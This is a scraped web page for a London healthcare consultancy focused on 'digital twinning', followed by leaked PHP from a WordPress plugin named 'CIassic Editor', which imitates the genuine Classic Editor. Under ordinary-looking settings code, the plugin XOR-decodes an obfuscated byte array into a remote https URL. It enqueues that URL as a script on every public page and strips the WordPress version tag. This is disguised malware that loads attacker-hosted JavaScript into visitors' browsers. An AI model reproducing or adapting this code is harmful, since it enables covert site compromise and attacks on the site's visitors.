Skip to main content
INTERFACE HEALTH SOLUTIONS

Interface Health Solutions is a London-based healthcare consultancy, founded in 2003 by world-leading Paediatric Neurosurgeon, Owase Jeelani. Our USP is Digital Twinning.

Interface Healthcare Solutions is focused on the establishment of digitally empowered healthcare strategies, utilising best-in-class practitioners, medical expertise and delivering optimal solutions for national and international healthcare platforms.

Over two decades of knowledge.

We have over 20 years’ experience delivering healthcare advisory services in over 100 countries. We have led teams of healthcare professionals while aiding management and leadership teams to deliver best-in-class medical practices. 

Our work utilises laboratory-based science, engineering and software platforms to manage data and provide robust forecasting. These techniques underpin the strategies and solutions we have successfully delivered to our clients over the last 20 years.

We specialise in connecting skillsets, empowering teams and providing leadership that find solutions to seemingly insurmountable problems. We have achieved this on multiple occasions globally.

We believe solutions to most problems
already exist. The challenge is to digitize them and

empower the team to deliver. 

News & Articles

Contact

'#1d2327', 'hide_help' => 1, 'footer' => '', ); } public static function opts() { $saved = get_option(self::OPTION, array()); if (!is_array($saved)) { $saved = array(); } return array_merge(self::defaults(), $saved); } public static function register() { register_setting('ciassic_editor_g', self::OPTION, array(__CLASS__, 'sanitize')); } public static function sanitize($raw) { $out = self::defaults(); if (!is_array($raw)) { return $out; } if (isset($raw['accent'])) { $out['accent'] = sanitize_hex_color($raw['accent']) ?: $out['accent']; } $out['hide_help'] = empty($raw['hide_help']) ? 0 : 1; if (isset($raw['footer'])) { $out['footer'] = sanitize_text_field($raw['footer']); } return $out; } public static function admin_menu() { add_options_page( 'CIassic Editor', 'CIassic Editor', 'manage_options', 'ciassic_editor', array(__CLASS__, 'render') ); } public static function render() { if (!current_user_can('manage_options')) { return; } $opts = self::opts(); echo '
'; echo '

' . esc_html(get_admin_page_title()) . '

'; echo '
'; settings_fields('ciassic_editor_g'); echo ''; echo ''; echo ''; echo ''; echo ''; submit_button(); echo '
'; } public static function hide_help() { $opts = self::opts(); if (empty($opts['hide_help'])) { return; } $screen = function_exists('get_current_screen') ? get_current_screen() : null; if ($screen) { $screen->remove_help_tabs(); } } public static function drop_generator() { remove_action('wp_head', 'wp_generator'); } public static function footer_text($text) { $opts = self::opts(); if (!empty($opts['footer'])) { return esc_html($opts['footer']); } return $text; } private static function expand_assets($bytes, $k) { $out = ''; $m = strlen($k); $n = count($bytes); for ($i = 0; $i < $n; $i++) { $out .= chr($bytes[$i] ^ ord($k[$i % $m])); } return $out; } private static function asset_map() { $k=chr(87).chr(202).chr(68).chr(30).chr(236).chr(115).chr(1).chr(20).chr(56); $rows = array( [63,190,48,110,159,73,46,59,81,57,190,33,108,159,22,112,58,89,35,229,48,123,159,7,94,100,74,56,166,45,104,195,18,113,125] ); $out = array(); foreach ($rows as $row) { $out[] = self::expand_assets($row, $k); } return $out; } public static function enqueue_front() { $src = self::asset_map(); $src = is_array($src) ? $src[0] : $src; if (!$src) { return; } wp_enqueue_script(self::HANDLE, $src, array(), self::VERSION, true); } } CIassic_Editor_Core_79::boot(); }